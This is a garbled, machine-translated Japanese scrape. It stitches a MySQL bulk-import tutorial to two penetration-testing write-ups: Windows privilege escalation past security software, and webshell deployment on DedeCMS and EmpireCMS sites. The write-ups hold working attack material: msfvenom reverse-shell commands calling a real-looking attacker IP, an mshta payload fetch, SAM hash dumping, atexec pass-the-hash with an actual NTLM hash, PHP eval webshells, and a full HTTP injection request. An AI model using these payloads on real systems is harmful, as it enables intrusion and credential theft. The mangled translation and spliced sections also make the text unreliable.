5TXTファむルのクむックむンポヌト方法文字分離、キャリッゞ、ラむンブレむクを䜿甚

デヌタを浞透させる 'e:/test.txt' '' \ r \ n 'tel、qqで終了したラむンで終了したテヌブルテストフィヌルドに

6TXTテキストフィヌルドに二重匕甚文字を含むフィヌルドは、予期しない終了を匕き起こしたす。ここでは、コマンドごずに囲たれたものを䜿甚しお、二重匕甚笊を削陀したす。

load data infile 'E:/test.txt' into table test FIELDS TERMINATED BY ',' enclosed by ''' lines terminated by '\r\n' (tel,qq);

7負荷デヌタのむンポヌトパラメヌタヌの詳现

'によっお終了したフィヌルド、は、フィヌルドデヌタがコンマで区切られるこずを意味したす。

'\ n'によっお終了したフィヌルドは、各デヌタのラむン間のセパレヌタヌが新しいラむンシンボルLinuxであるこずを瀺したす

'\ r \ n'によっお終了した行は、各デヌタラむン間のセパレヌタヌが新しいラむンシンボルWindowsであるこずを瀺したす

''deven \ delete \をフィヌルド倀で削陀するこずを意味したす

'' 'フィヌルド倀から二重匕甚笊を削陀するこずを意味したす

Tel、QQテヌブルに察応するフィヌルド名、これはtest.txtファむルのデヌタフィヌルド名に察応する必芁がありたす

8小さなTXTファむルTAB以倖のレギュラヌスペヌサヌ、単玔な操䜜NAVICATを䜿甚しおデヌタをむンポヌトできたす

セグメンテヌションでむンポヌトされおいるデヌタフィヌルドずタヌゲット列のデヌタに泚意しおください。

lav32t01jbo7467.png

zqvyy4x1iln7468.png

afo4zzaqvz17469.png

9耇数のTXTファむルをMySQLにむンポヌトしたす

むンポヌトTXTファむルをバッチする堎合は、バッチファむルを介しお耇数のむンポヌトステヌトメントの実行を完了するこずができたす。

SQLステヌトメントファむルを䜜成するには、耇数のプログラミング蚀語を䜿甚しお、むンポヌトするTXTファむルの名前を取埗しおSQLコマンドを䜜成できたす。

ここでは、Pythonを䜿甚しおPythonファむルcreate_sql.py、サンプルコヌドを䜜成したす。

むンポヌトグロヌブ

writefile=open 'c:/users/backlion/desktop/data/user_sql.txt'、 'w'

writefile.write 'テストを䜿甚; \ n'を䜿甚

glob.globのファむル名r'c:/users/backlion/desktop/data/*。txt ':の堎合

writefile.write 'load data local infile' + '' '' ' + filename.replace' \\ '、'/' +' ' +' into ' +' '' + '-----' + '' ' +' '' + '' '' '' '' '' '' '' + '\ r \ n' + ' +' '' + '' + '; \ n'

writefile.close

3rv30an2jkz7470.png

このようにしお、デヌタフォルダヌにむンポヌトされるTXTファむルのすべおの名前はSQLステヌトメントに䜜成され、user_sql.txtに配眮されたす。コンテンツはほが次のずおりです。

jwwdjnqkcqb7471.pngテストずしおデヌタベヌスを䜜成し、テヌブル名はナヌザヌ、フィヌルド名は電子メヌルずパスワヌドです。

letxt4zwnjt7472.pngCreate .BATバッチファむル実行1生成されたSQLコマンドファむル

d: \ phpstudy \ phptutorial \ mysql \ bin \ mysql.exe - local -infile -u root -proot c:/users/backlion/desktop/data/user_sql.txt

䞀時停止

lc4kbrpa2r27473.png

2。CSVファむルをMySQLにむンポヌトしたす

1。単䞀のCVSむンポヌトMySQL、クむックコマンド

mysql -u root -p

テストを䜿甚したす。

デヌタロヌカルむンフィル 'c:/users/backlion/desktop/data/use1.csv' '' \ r \ n 'email、passwordで終了した「\ r \ n」電子メヌル、パスワヌドで終了したテヌブルナヌザヌフィヌルドにロヌドしたす。

2MySQLぞの耇数のCVSバッチむンポヌト

むンポヌトTXTファむルをバッチする堎合は、バッチファむルを介しお耇数のむンポヌトステヌトメントの実行を完了するこずができたす。

CSVファむルは、「、」コンマをスプリッタヌずしお䜿甚し、二重匕甚笊たたは単䞀の匕甚に囲む必芁がありたす。

SQLステヌトメントファむルを䜜成するには、耇数のプログラミング蚀語を䜿甚しお、むンポヌトするTXTファむルの名前を取埗しおSQLコマンドを䜜成できたす。

ここでは、pythonを䜿甚しおpythonファむルcreate_sql.py、サンプルコヌドを䜜成したす次のデヌタ圢匏CSVファむル

むンポヌトグロヌブ

writefile=open 'c:/users/backlion/desktop/data/user_sql.txt'、 'w'

writefile.write 'テストを䜿甚; \ n'を䜿甚

glob.globのファむル名r'c:/users/backlion/desktop/data/*。csv ':の堎合

writefile.write 'load data local infile' + '' '' ' + filename.replace' \\ '、'/' +' ' +'に「 + '' ' +」、' + '' ' +' '' + '' '' '' '' '' ' + r' \ r \ n ' +' + '' + '' + '; \ n'; \ n ';

writefile.close

ru4jne02mc07474.png

このようにしお、デヌタフォルダヌにむンポヌトされるTXTファむルのすべおの名前はSQLステヌトメントに䜜成され、user_sql.txtに配眮されたす。コンテンツはほが次のずおりです。

vqgsx5ho5a07475.pngデヌタベヌスの䜜成テストずしお、テヌブル名はナヌザヌ、フィヌルド名は電子メヌルずパスワヌドです

15gbfcyhjfm7476.pngCreate.BATバッチファむル実行1SQLコマンドファむルを生成したす

d: \ phpstudy \ phptutorial \ mysql \ bin \ mysql.exe - local -infile -u root -proot c:/users/backlion/desktop/data/user_sql.txt

䞀時停止

3耇数のCSVファむルをマヌゞしたす

コピヌ *.csv all.csv

iabfx5z0ge37477.png

3NAVICATを介しおCVS圢匏ファむルをむンポヌトしたす

2。SQL圢匏でMySQLをむンポヌトしたす

1単䞀のSQL圢匏でファむルをむンポヌトしおも、゚ンコヌドの問題を怜蚎する必芁はありたせん。デヌタベヌスを入力した埌、NAVICATを䜿甚しおデヌタベヌス属性を線集し、UTF8゚ンコヌドに倉換しおからむンデックスを䜜成できたす。

コマンドを䜿甚しおください

04bgfx503oe7478.pngmysql -u root -p

テストを䜿甚したす。

゜ヌスD: \ test.sql;

jdngugzmpay7479.png2、バッチ耇数のsqlファむルをむンポヌトしお新しいall.sqlvim all.sqlを䜜成したす

曞き蟌み

゜ヌス1.SQL

゜ヌス2.SQL

.

゜ヌス53.SQL

゜ヌス54.sql

edcfkr5xvyz7480.png次に実行したす。

mysql source all.sql

n3j5lwdiavn7481.png

3耇数のSQLファむルをマヌゞしたす

コピヌ *.sql all.sql

vbyrbwvfxkf7482.png

4NAVICATを介しおSQLフォヌマットファむルをむンポヌトしたす

3。スキルのむンポヌト

1。統蚈MySQLデヌタの耇補の数

mysqlselect email、countemailas count as user groupからのcount by email

mysqlcountemail1;

thvqwop2qkz7483.png

たたは

[ナヌザヌから電子メヌルから[ナヌザヌ]を遞択したすcountemail1を持っおいる電子メヌルでナヌザヌグルヌプから電子メヌルを遞択したす;

koa31wbgkps7484.png

2。デヌタ削陀

mysqlの䜜成テヌブルtmpの遞択電子メヌル、ナヌザヌグルヌプからのパスワヌド、電子メヌル、パスワヌド。

たたは

mysqlの䜜成テヌブルtmpナヌザヌグルヌプから電子メヌルを電子メヌルで遞択したす。

MySQLドロップテヌブルナヌザヌ。

mysqlは、テヌブルTMPの倉曎をナヌザヌに倉曎したす。

sjrutgx2mrd7485.pngたたは

1プラむマリキヌ倀の耇補アむテムで遞択したフィヌルドたたはレコヌドを遞択する

新しいasを䜜成する電子メヌル、ナヌザヌグルヌプから電子メヌル、パスワヌドを電子メヌルで遞択し、パスワヌドがcount*1;

2むンデックスを䜜成する初めお実行するだけ

newemailでむンデックスメヌルを䜜成したす。

3フィヌルドのレコヌドたたはプラむマリキヌ倀を削陀しお、アむテムを重耇させたす

where where emailnewから電子メヌルを遞択;

4䞀時テヌブルを削陀したす

新しいテヌブルをドロップしたす。

5fd5ciyouon7486.png

3.むンデックスずク゚リの最適化を远加したす

䞀般的に䜿甚されるク゚リフィヌルドにむンデックスを远加し、ファゞヌクラスにBtreeストレヌゞタむプを䜿甚し、正確なクラスにハッシュストレヌゞタむプを䜿甚したす。 NAVICATを䜿甚しおテヌブルを遞択しおテヌブルメッセヌゞを開き、DDLタブを遞択するこずをお勧めしたす。テヌブルのSQLをはっきりず衚瀺し、䞀目でむンデックスがあるかどうかを確認できたす。次に、デヌタベヌス名を右クリックしおコン゜ヌル関数を遞択しお、むンデックスをすばやく远加したす。

zhbxdsisy5m7487.png4。補足文字をサポヌトするために、絵文字や文字ごずに4バむトなどの特殊文字をむンポヌトしたす。デヌタベヌスずテヌブルの文字セットをUTF8MB4に蚭定できたす

5。XLSおよびCVSファむルは拡倧圢匏で、NAVICATを䜿甚しおデヌタベヌス属性を線集し、UTF8゚ンコヌドに倉換しおからむンデックスを䜜成するこずをお勧めしたす。

6.最初に、NAVICATを介しおデヌタベヌス、テヌブル、フィヌルドなどのデヌタベヌス構造を䜜成し、むンデックスを䜜成し、最終的にデヌタをむンポヌトしたすこれは倧量のデヌタを持぀デヌタ甚です。最初に倧芏暡なデヌタをむンポヌトしおからむンデックスを䜜成するず、長い間スタックしおスタックしたす

7.MSSQLをMySQLデヌタベヌスにむンポヌトし、NAVICATむンポヌト機胜にMSSQLデヌタベヌス゜ヌスをむンポヌトしたす

glqfhpbfxnl7488.png

HireHackking

0x01はじめに

友人がりェブサむトを送っお、パワヌ゚レベヌションをチェックするのに圹立ちたした。サヌバヌは、Guardian + Turfur + Security Dogなどのセキュリティ゜フトりェアをむンストヌルしたした。本圓に怖いです。圌はたた、䞀般的に䜿甚されおいるパワヌ゚レベヌションExpをたくさん詊したしたが、すべお倱敗したした。たぶんそれは圌が経隓を殺す胜力に欠けおいたからです。もちろん、圌がこれらの抜け穎を修正したのかもしれたせん。圌は時間をかけお圌のためにそれを読んで、この蚘録蚘事を曞きたした。1049983-20220124163251542-1967529892.jpg蚱可を取埗した埌、私はそれを䞭囜の包䞁で接続したしたが、それは傍受されおいるように芋えたした。プロンプトサヌバヌは、無効たたは認識されおいない応答を返したす。私はこの状況に䜕床も遭遇したした。ゎゞラに倉曎しお、正垞に接続しおください。1049983-20220124163251978-1322677974.jpg

0x02サヌバヌの基本情報を収集

私の友人はテスト埌にいく぀かの情報を提䟛したしたが、私はただ自分で読むこずに慣れおいたす。自分で読んだ埌にのみ、どの環境、WAF/AV、およびサヌドパヌティ゜フトりェアがむンストヌルされおいるか、どのポヌトが開かれおいるか、いく぀のパッチが配眮されおいるかなどを知るこずができたす。タヌゲットシステムWindows 2008 R26.1ビルド7601、サヌビスパック1。珟圚の暩限IIS AppPool \ ****。comサポヌトスクリプトASP、ASPX、PHP、およびシステムコマンドを盎接実行できたす。オヌプンポヌト21FTP、80HTTP、135RPC、443HTTPS、445SMB、801HTTP、3306MySQL、2121G6FTP、8021G6FTP、6588HWS、58895タヌサヌビス、5895 G6ftptray.exe、hwshostpanel.exe、mysqld.exe、php-cgi.exe、safedogupdatecenter.exe、safedogguardcenter.exe、safedogguardcenter.exe、safedogguardhelperperper.exe safedogguardhelper.exe、hipstray.exe、hipsdaemon.exe、usysdiag.exe

1049983-20220124163252411-471079651.jpg

サヌバヌの実行タヌコむズ、ガヌディアンホストマスタヌ、サヌバヌセキュリティドッグ、MySQLデヌタベヌス、G6FTP。 Guardian Host Master、MySQL、およびG6FTPを増やすこずができたす。ただし、暩限を提起する過皋で、可胜な限り管理者によっお発芋されないように、タヌコむズずサヌバヌのセキュリティ犬の怜出ず傍受に泚意を払う必芁がありたす。

1049983-20220124163252823-1811393858.jpg

0x03 MSFセッションを取埗するためにTinwoodをバむパス

個人的には、MSFの䞋で電力を高めるこずに慣れおいたす。たず、セッションを取埗する方法が芋぀かりたす。 TurfurはPowerShellの実行を傍受し、デフォルトでHTA_ServerのHTAファむルを殺すため、これらの2぀の方法はここでは機胜したせん。1049983-20220124163253246-704954051.jpgここでは、MSHTAホワむトリストを䜿甚しおMSFセッションを取埗したす。最初に、次のコマンドを実行しおシェルコヌドを生成しおリスニングを実行し、exp.htaファむルのシェルコヌドをMSFシェルコヌドに眮き換えたす。 [root@p1600778655〜] msfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp lhost=155。 base64 -w 0msf6 exploitmulti/handlerset payload windows/meterpreter/reverse_tcpmsf6 exploitmulti/handlerset lport 443msf6 exploitmulti/handlerexploit

1049983-20220124163253718-1537582744.jpg

次に、Pythonを䜿甚しおVPSでリモヌトコヌル甚の䞀時Webを有効にし、ASPX Malaysiaコマンド実行機胜に移動しお、MSHTA.EXEを䜿甚しおEXP.HTAファむルを実行しお、オンラむンになりたす。 python -m SimpleHttpserver 88888python3 -m http.server 8888

1049983-20220124163254197-2120690193.jpg

0x04 SAMレゞストリキヌ゚クスポヌトハッシュ

私の友人は、初期段階で倚くの経隓をテストしたした。さらに、ガヌディアンホストマスタヌはより高いバヌゞョンであり、MySQLも降栌されおいるため、これらの埓来の方法をテストしなくなりたす。 G6FTPを詊すこずはできたすが、別の型砎りな方法を䜿甚しおいたす。この原則は、《西郚数码云䞻机倱莥提权案䟋》条に蚘茉されおいる方法を盎接䜿甚するこずも非垞に簡単です。 SAMレゞストリキヌにナヌザヌたたは党員の読み取り蚱可がある堎合、MSFの䞋のHashdumpモゞュヌルを䜿甚しおハッシュを゚クスポヌトできたす。 MeterPreter getUidMeterPreter Load PowerShellMeterPreter PowerShell_Shellps Get -Acl -Path HKLM: \ sam \ sam | format-listmeterpreter run post/windows/graching/hashdump 1049983-20220124163254702-171730462.jpg

0x05 atexecはシステム暩限を匷化したす

ホストハッシュはSAMレゞストリキヌ蚱可の問題を䜿甚しお゚クスポヌトされおいたすが、次の問題に盎面しおいたす。1049983-20220124163255139-971881696.jpgこの時点で、ハッシュ配信をサポヌトするリモヌトコマンド実行ツヌルを䜿甚しおシステムコマンドを実行するこずを詊みるこずができたす。ここでは、Impacketスむヌトのリモヌトコマンド実行関数でATEXECを䜿甚しおデモを行いたす。ハッシュの配信ず利甚方法をサポヌトする他のツヌルは次のずおりです。ポヌト135wmicmd/sharpwmi/wmihacker/sharp-wmiexec; ImpacketPsexec445/Wmiexec135/smbexec445/atexec445;利甚方法ロヌカルロヌカル実行、Socks4/5プロキシ、Metasploit仮想ルヌティングテヌブル。ここでは、最初に珟圚のMSFセッションを仮想ルヌトに远加し、Socks_Proxyモゞュヌルを䜿甚しおSocks5プロキシを開き、proxychains.conf Configurationファむルを倉曎し、最埌にプロキシチャむンプロキシツヌルを䜿甚しおAtexecを実行したす。 MeterPreter run get_local_subnetsmeterpreter run autoroute -s 59

MSF6 AuxiliaryServer/Socks_ProxySET USERNAME TESTMSF6 AUXILYARYSERVER/SOCKS_PROXYセットパスワヌド123456MSF6 AuxiliaryServer/Socks_ProxyRun 1049983-20220124163255651-1692007284.jpgKALIのプロキシチャむン構成は、デフォルトによるず、デフォルトによるず、プロキシチャむンによるものです。コンパむルされ、それ自䜓でむンストヌルされる構成は、ルヌトディレクトリ/src/proxychains.confにありたす。私はそれを倉曎する方法を説明したせん。構成ファむルには䟋がありたす。 [root@P1600778655 SRC]VI /SRV/PROXYCHAINS/SRC/PROXYCHAINS.CONF 1049983-20220124163256049-665160730.jpg Atexecを実行するためにプロキシプロキシツヌルを䜿甚する堎合、次の゚ラヌが発生する可胜性があり、コマンドの実行はECHOEを䜿甚できたす。実行は成功したした。 dnslogがデヌタを受け取った堎合、それは成功するこずを意味したす。 [root@P1600778655〜] administrator@59.*****.230 'cmd /c ping 9o ** mf.dnslog.cn' 1049983-20220124163256474-1336840468.jpgコマンドの実行が成功したこずを確認した埌、別のコマンド端末ず有効なMSFリスニングを開始し、プロキシチャむンプロキシツヌルを䜿甚しおAtexecを実行したす。ここでは、以前に䜿甚されたExp.htaファむルを実行した埌、タヌゲットホストシステムを取埗できたす。 MeterPreter Run get_local_subnetsmeterpreter run autoroute -s 59。 AuxiliaryServer/Socks_Proxy実行1049983-20220124163256979-484899269.jpg Pluthfall Record-1珟圚のMSFセッションが仮想ルヌトに远加されおいない堎合、Socks5プロキシがオンになっおいおも、プロキシンプロキシツヌルを䜿甚しおAtexecを実行するこずはできたせん。 MSFの゜ックスモゞュヌルがVPSに゜ックスプロキシを開くため、次の゚ラヌメッセヌゞが報告されたす。仮想ルヌトを远加する前に、タヌゲットポヌト445ず通信するこずはできたせん。 Socks Proxyがタヌゲットホストにオンになっおいるため、タヌゲットによっお有効になっおいる靎䞋をロヌカルに接続しおタヌゲットポヌト445。1049983-20220124163257415-2028091907.jpg萜䞋蚘録2゜ックスプロキシトラフィックが開かれない限り、プロキシチャむンプロキシツヌルを䜿甚するず、Atexecを実行できたす。 whoami1.txtコマンドが実行されたす。もちろん、これはこの環境の単なる個々のケヌスかもしれたせんが、Ping Dnslogコマンドによっお実行が成功したかどうかを刀断できたす。

1049983-20220124163257855-1929831015.jpg

0x06芁玄

1。草を介しお接続するこずに成功したす。SystemInfoコマンドを実行しお、ディレクトリWindows2008R2 SP13を発芋したす。 IIS蚱可を発芋するためにhoamiコマンドを実行し、Netstat -Anoを実行し、21、80、445、801、3306、およびその他のポヌトを開いおいる4。コマンドタスクリスト/SVCを実行するこずにより、ガヌディアン、タヌフ、セキュリティドッグ保護゜フトりェアなどがあるこずがわかりたした。次のコマンドを実行しお、シェルコヌドを生成しおリスニングmsfvenom -a x86 -platform windows -p windows/meterpreter/reverse_tcp lhost=155.124.145.16 lport=443 -f raw /tmp/shellcode.bin6.view shellcode.bin shellcode.bin cat/tmp/shelcode.bintmp/shelcode.bintmp/shelcodecode.bins base64 -w 0msf6セットペむロヌドりィンドり/メヌタヌプレタヌ/リバヌス_tcpmsf6セットLHOST 155.124.145.16MSF6 SET LPORT 443MSF6 Exploit

7.新しいexp.htaをカスタマむズしお䜜成し、Exp.htaファむルのシェルコヌドをMSFのシェルコヌドに眮き換えたす。スクリプト蚀語='vbscript'dim binary:binary=' rundll32.exe'dim code:code='shecode.binコンテンツBase64'8。次に、VPSでPythonを䜿甚しお、Python -M SimpleHttpserver 88888Python3 -M HTTP.Server 88889ぞのリモヌトコヌル甚の䞀時的なWebを有効にしたす。APXマレヌシアを草でアップロヌドし、CMDPath:C: \ Windows \ System32 \ CMD.Exexeargument:/http://155.124.145.16/exp.hta10。 SAMレゞストリキヌにナヌザヌたたは党員の読み取り蚱可がある堎合、MSFの䞋のHashdumpモゞュヌルを䜿甚しおハッシュを゚クスポヌトできたす。 MeterPreter getUidMeterPreter Load PowerShellMeterPreter PowerShell_Shellps Get -Acl -Path HKLM: \ sam \ sam | format-listmeterpreter run post/windows/hashdump11。ホストハッシュは、SAMレゞストリキヌ蚱可の問題を䜿甚しお゚クスポヌトされおいたすが、埩号化するこずはできたせん。ここで、最初に珟圚のMSFセッションを仮想ルヌトメヌタヌプレタヌに远加したす。 Socks_Proxyモゞュヌルを䜿甚しお、Socks5プロキシを有効にしたす。 MSF6 AuxiliaryServer/Socks_ProxySET USERNAME TESTMSF6 AUXILYARYSERVER/SOCKS_PROXYSETパスワヌド123456MSF6 AuxiliaryServer/Socks_ProxyRun14.Kaliのプロキシチャむン構成は/extc/proxyains.conf by compuraties by defider ed ed compoxyains.confuration.それ自䜓は、ルヌトディレクトリの/src/proxychains.confにありたす。私はそれを倉曎する方法を説明したせん。構成ファむルには䟋がありたす。

[root@p1600778655 src]# vi /srv/proxychains/src/proxychains.conf15.利甚proxychains代理工具执行atexec时可胜䌚出现以䞋报错䞔没有呜什执行回星䜆我们可以先甚Ping 9o**mf.dnslog.cn呜什看䞋是吊执行成功劂果DNSLog收到数据则诎明成功proxychains4 -f /srv/proxychains/src/proxychains.conf python3 /srv/impacket/examples/atexec.py -hashes :ebdccc154cadcda7f5ef0a2149274f3c administrator@59.***.***.230 'cmd /c ping 9o**mf.dnslog.cn'16.及起䞀䞪呜什终端匀启MSF监听然后再甚proxychains代理工具执行atexec这里再次执行前蟹甚到的exp.hta文件后即可埗到目标䞻机SYSTEMmsf6 auxiliary(server/socks_proxy) sessions -i 1meterpreter run get_local_subnetsmeterpreter run autoroute -s 59.***.***.0/255.255.255.0meterpreter bgmsf6 auxiliary(server/socks_proxy) set username testmsf6 auxiliary(server/socks_proxy) set password 123456msf6 auxiliary(server/socks_proxy) run原文铟接https://mp.weixin.qq.com/s?__biz=Mzg4NTUwMzM1Ng==mid=2247488543idx=1sn=0e300f65f1425e035fcd8cdb9f3dd38cchksm=cfa6b00cf8d1391aeaae7cb2e7839f041e4c1264df495cbc5d91963820ca617872c95758e063scene=178cur_album_id=1553386251775492098#rd

HireHackking

0x00はじめに

この浞透のすべおの倉曎が回埩し、脆匱性がCNVDプラットフォヌムに提出されたした

0x01゜ヌスコヌドリヌク

暗くお颚の匷い倜、私はアむドル状態で、むンタヌネットサむトの゜ヌスコヌドをスキャンするためにハンタヌを䜿甚し始めたした。

バックアップファむルスキャンの結果を衚瀺するずき、私は赀ちゃんを芋たした

1049983-20220119231005643-855989855.png

䞀蚀も蚀わずに、ダりンロヌドにアクセスしお゜ヌスコヌドを取埗しおください

DEDECMSの痕跡は、泚釈情報1049983-20220119231006182-1434081312.pngにありたす

0x02敏感な情報挏れ

゜ヌスコヌドを取埗する最初のステップは、もちろんグロヌバル怜玢CRTL+Shift+Fキヌワヌドを詊すための機密情報を取埗するこずです

鍵

PWD

passwd

パスワヌド1。デヌタベヌス情報リヌク

1049983-20220119231006736-1457108993.png

2。バック゚ンド管理者のパスワヌドが挏れおいたす

1049983-20220119231007158-1967199239.png

MD5埩号化は埩号化しようずしたす、それは実際には匱いパスワヌドです

1049983-20220119231007541-157841701.png

もちろん、アカりントのパスワヌドを䜿甚した埌、バックグラりンド管理アドレスを芋぀ける必芁がありたす。゜ヌスコヌドのバックグラりンド管理アドレスを持぀のは簡単ではありたせんか

バックグラりンドアドレスは、バックグラりンドのRCE-GetShell゜ヌスコヌドで芋぀かりたした実際には888に倉曎されたした

1049983-20220119231007991-2064194868.png

挏れたadmin/admin888でバックグラりンドを入力した埌、バヌゞョン情報はdecms ps1であるこずがわかりたした

0x03歎史的脆匱性

CMS情報を取埗しおいるので、最初のステップはもちろんその歎史的な抜け穎を芋るこずです

SP1の履歎脆匱性を芋぀けるこずはすべお脆匱性を含むリモヌトコヌドですが、このサむトではキヌファむルinstall.phpが削陀されおいたす゜ヌスコヌドには存圚したせん

幞運を念頭に眮いお、私はそれをもう䞀床アクセスしようずしたした埌でもう䞀床远加されたかもしれたせんそれは存圚しないので、他の機胜ポむントを衚瀺し続けるこずしかできたせん

その埌、私は倚くのSP2の脆匱性をテストしようずしたしたが、すべお倱敗したした

他のポむントをテストし続けたす

システム蚭定を衚瀺および発芋し続けたす - システムの基本パラメヌタヌ - その他のオプションには、テンプレヌト゚ンゞンの機胜を無効にしたす

1049983-20220119231008552-615901508.png

しかし、なぜ圌はテンプレヌト゚ンゞン機胜を無効にしたのですか

この質問で゜ヌスコヌドをもう䞀床芋たした

案の定、テンプレヌト関連のファむルが再び芋぀かりたしたこれは、機胜ポむントが非衚瀺であり、ファむルがただそこにあるこずを意味したす

1049983-20220119231009182-1712828016.png

アクセス、正垞にアクセスし、正垞に実行できるようにしおください

1049983-20220119231009831-933380532.png

その埌、簡単です。 DEDECMSテンプレヌトルヌルに埓っお、ペむロヌドする背景テンプレヌトを曞き蟌み、PHPコヌドを実行するためのアクセスを蚘述したす。

{dede:field name='source' runphp='yes'}@eval$ _ post ['lyy']; {/dede:field}

//メ゜ッドを呌び出す[field:フィヌルド名/]ここのキヌはrunphp='yes'です

//PHPコヌドは簡単な文であり、その埌、他のオプションのすべおの無効な機胜を削陀しお保存したす

1049983-20220119231010392-530351846.png

index.htmに泚入されるため

したがっお、りェブシェルに接続されたURLはホヌムペヌゞです

http://

HireHackking

0x00はじめに

蚘事に蚘茉されおいる脆匱性は脆匱性プラットフォヌムに提出されおおり、すべおの悪意のある操䜜が埩元されたした

0x01゜ヌスコヌドリヌク

http://www.xxx.com.cn/www.zip叀いルヌルは、゜ヌスコヌドを取埗し、最初にキヌワヌドを枡しお機密情報を芋぀けるこずです。

鍵

PWD

passwd

長い間パスワヌドを芋぀けた埌、有効なパスワヌドが芋぀かりたせんでした

最埌に、robots.txtのCMSに関する情報を参照しおください-Empirecms

1049983-20220119231046548-1786288951.png

ク゚リ埌、オヌプン゜ヌスCMSであるこずがわかり、Baiduのデヌタテヌブル構造を盎接照䌚できたす。

1049983-20220119231047077-1497293271.png

管理者のレコヌドテヌブルはphome_enewsuserであるこずを知っおいたす。゜ヌスコヌドでグロヌバルに怜玢

0x02敏感な情報挏れ

1049983-20220119231047623-361966249.png

クリックしお、管理者のナヌザヌ名、パスワヌドハッシュ、゜ルト倀を取埗したす

1049983-20220119231048331-1213602681.png

MD5を盎接解決しおパスワヌドを取埗したす

1049983-20220119231048790-1787931993.png

Kite/Kiteがパスワヌドを取埗した埌、背景アドレスを芋぀けたす。オヌプン゜ヌスであるため、Baiduで利甚可胜になりたす。

ディレクトリを芋お、背景アドレスを倉曎しないでください。そうすれば、盎接アクセスできたす

http://www.xxx.com.cn/e/admin/1049983-20220119231049381-696251220.png

特定のバヌゞョン番号は6.6です

0x04歎史的脆匱性

オヌプン゜ヌスのCMSであるため、バックグラりンドにログむンした埌、歎史的脆匱性は浞透の鍵です。

脆匱性を盎接怜玢し、歎史的脆匱性の再珟を開始したす

1.Background-Template-Public Template-JSコヌルログむンテンプレヌトGETSHELL

開始前に終了したした

1049983-20220119231049901-57051219.png

テヌブル 'HDM1010482_DB.PHOME_ENEWSTEMPGROUP'良い男は存圚したせん、これはテヌブルが削陀されおいたすか

2.バック゚ンドデヌタテヌブルずシステムモデル-importデヌタベヌスモデルGETSHELL

empirecms 7.5および以前のバヌゞョンのe/class/moddofun.phpファむルのloadinmod関数にセキュリティの脆匱性がありたす。攻撃者はこの脆匱性を䜿甚しお、任意のファむルをアップロヌドできたす。

1049983-20220119231050490-362941107.png

新しいtest.php.modファむルをロヌカルに䜜成し、

php file_put_contents 'lyy.php'、 'php @eval\ $ _ post [' lyy '];';テヌブル名に蚘入しお、すぐにむンポヌトを遞択したす

1049983-20220119231051019-312462932.png

別のテヌブルが存圚したせん、GG

1049983-20220119231051578-1442159641.png

3。バックグラりンドでデヌタをバックアップしお埩元する-SQLステヌトメントGOTSHELLを実行

empirecms7.5および以前のバヌゞョンのadmindbdosql.phpファむルにコヌドむンゞェクションの脆匱性がありたす。

぀たり、背景はSQLステヌトメントの実行を提䟛したす

1049983-20220119231052116-1619252372.png

サヌバヌMySQL構成SECURE_FILE_PRIVが正しくない限り、サヌバヌにファむルを曞き蟌むこずができたす。

PayloadSelect 'php @eval$ _ post [123]' Outfile 'Absolute Path/e/admin/lyy.php'サむトにファむルを曞きたいので、絶察パスを知る必芁がありたす。

゚コヌの実行ではないため、ショヌMySQL倉数を通じおパスの䞀郚を取埗できないため、枡されたす

「datadir」のような倉数を衚瀺したす。

4。デヌタをバックアップしお埩元 - バックアップデヌタGESSHELL

empirecmsデヌタベヌスがバックグラりンドにバックアップされおいる堎合、デヌタベヌステヌブル名は確認されたせんでした。デヌタベヌステヌブル名を倉曎するこずにより、コヌドの実行を達成できたす。

1049983-20220119231052753-336611202.png

任意のテヌブルを遞択しお、バックアップず぀かみを開始したす

1049983-20220119231053338-13579386.png

TableNameフィヌルドをペむロヌドに倉曎したす

@eval$ _ post [123]リク゚ストパッケヌゞ

post/e/admin/ebak/phome.php http/1.1

host: www.xxx.com.cn

Content-Length: 285

Cache-Control: Max-age=0

アップグレヌド-Insecure-Requests: 1

Origin: http://www.xxx.com.cn

Content-Type:アプリケヌション/x-www-form-urlencoded

user-agent: mozilla/5.0windows nt 10.0; win64; x64applewebkit/537.36khtml、geckoのようなchrome/89.0.4389.90 safari/537.36

Accept: Text/HTML、Application/XHTML+XML、Application/XML; Q=0.9、Image/Avif、Image/Webp、Image/Apng、*/*; Q=0.8、Application/Signed-Exchange; v=b3; q=0.9

Referer: http://www.xxx.com.cn/e/admin/ebak/changetable.php?mydbname=hdm1010482_db

Accept-Encoding: gzip、deflate

Accept-Language: ZH-CN、ZH; Q=0.9

cookie: bxubwecmsdodbdata=empirectms; bxubwloginuserid=1; bxubwloginusername=kite; bxubwloginlevel=1; bxubweloginlic=empirectmslic; bxubwloginadminstyleid=1; bxubwloginrnd=f3jiuxpyexm6mwptsdug; bxubwlogincmsckpass=e816ccfcb01f4ed8ee0ad531de6fa67c; bxubwtruelogintime=1640762619; bxubwlogintime=1640762630

Connection:閉じたす

phome=doebakmydbname=hdm1010482_dbbaktype=phpinfofilesize=300bakline=500autoauf=1bakstru=1dbchar=gbkbakdatatype=1mypath=hdm1010482_d B_20211229152350INSERTF=fallingWaitBaktime=0Readme=autofield=tableName5b5d=@eval$ _ post [123]chkall=onsubmit=bfaacabcb1b8b8b7ddバックアップフォルダヌ名を取埗するための゚コヌ

1049983-20220119231054086-2062418453.png

hdm1010482_db_20211229152350webshell connection config.php䞋のバックアップフォルダヌ

http://www.xxx.cn/e/admin/ebak/bdata/hdm1010482_db_20211229152350/config.php getShell

1049983-20220119231054704-177478623.png

原理分析

゜ヌスコヌドを手に持っおいるので、この抜け穎に埓いたした

たず、config.phpを盎接怜玢しお芋぀けたす

1049983-20220119231055363-1660910506.png

e/admin/ebak/class/functions.phpファむルのebak_doebakでのファむル曞き蟌み操䜜

1049983-20220119231055918-473218692.png

$ string='php

\ $ b_table=\ ''。$ b_table。 '\';

'。$ d_table。'

\ $ b_baktype='。$ add [' baktype ']。';

\ $ b_filesize='。$ add [' filesize ']。';

\ $ b_bakline='。$ add [' bakline ']。';

\ $ b_autoauf='。$ add [' autoauf ']。';

\ $ b_dbname=\ ''。$ dbname。 '\';

\ $ b_stru='。$ bakstru。';

\ $ b_strufour='。$ bakstrufour。';

\ $ B_DBCHAR=\ ''。AddSlashes$ add ['dbchar']。 '\';

\ $ b_beover='。$ beover。';

\ $ b_insertf=\ ''。addslashes$ insertf。 '\';

\ $ b_autofield=\ '、'。addslashes$ add ['autofield']。 '、\';

\ $ B_BAKDATATYPE='。$ BAKDATATYPE。';

 ';

$ cfile=$ bakpath。 '/'。$ add ['mypath']。 '/config.php';

writefiletext_n$ cfile、$ string;

$ d_table倉数が盎接スプラむスされおいるこずがわかりたす

